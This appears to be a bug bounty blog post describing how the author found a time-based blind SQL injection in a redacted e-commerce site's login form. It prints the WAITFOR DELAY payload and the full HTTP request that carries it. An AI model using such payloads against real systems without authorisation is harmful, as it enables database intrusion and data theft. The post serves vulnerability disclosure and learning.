Open in app

Sign in

Write

Sign in

Yeah, First Time I Found Time-Based SQL-i or Blind SQL-i.

Amit Kumar Biswas @Amitlt2
2 min readNov 13, 2020

--

Hello Hackers!!

Hope You Guys are fine & your family too…

As You Guys know that I never Hunt any XSS, IDOR & CSRF in public Programs. Every Time I got a Duplicate issue : (

My Target is an e-commerce Web-app So Let’s called it Redacted.com

I tried hard to find some bugs like Low-hanging Fruits or something like P1/P2 but I didn’t get anything.

Aditya Shende motivates me to do something special and he said don’t stop!!!

Its Hero Time

Time-Based SQL-INJECTION:-

Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.

Here I found a login Panel but now what I have to do with this because I didn’t have any credentials so Randomly I Intercept the request and send it to the Repeater Now I have two input fields where it asks me for username and password. Randomly I put ABC in the username and in password. After that, the Response comes out with 718millis.

In the username and password field, I paste a Payload of Time-Based SQL-i

like this “;WAITFOR DELAY ‘0:0:1’- -

Observe the delay in Response

How can I exploit this

POST /login3.jsp HTTP/1.1

Host: Redacted.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 29

Origin: https://Redacted.com

Connection: close

Referer: https://Redacted.com/login.jsp

Cookie: JSESSIONID=3AF77827E98029896976FBBF7B87138E

Upgrade-Insecure-Requests: 1

username=“;WAITFOR DELAY ‘0:0:1’- -&password=“;WAITFOR DELAY ‘0:0:1’- -

Impact:-

The impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables, and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.

Reported

Got Triage with 20 POINTS

Happy Hacking

Sharing is Caring

Thanks to Aditya Shende

#BugBounty #BugCrowd #CyberSecurity #ViehGroup

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Bugcrowd
Bug Bounty
Hacking
Viehgroup

--

--

Amit Kumar Biswas @Amitlt2
Amit Kumar Biswas @Amitlt2

Written by Amit Kumar Biswas @Amitlt2

274 Followers
19 Following

Cyber Security Analyst at @avalanceGlobalSolutions | Security Researcher in | Cyber Security Researcher in Microsoft & Bugcrowd | R&D in Smart Contract |

Responses (2)

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams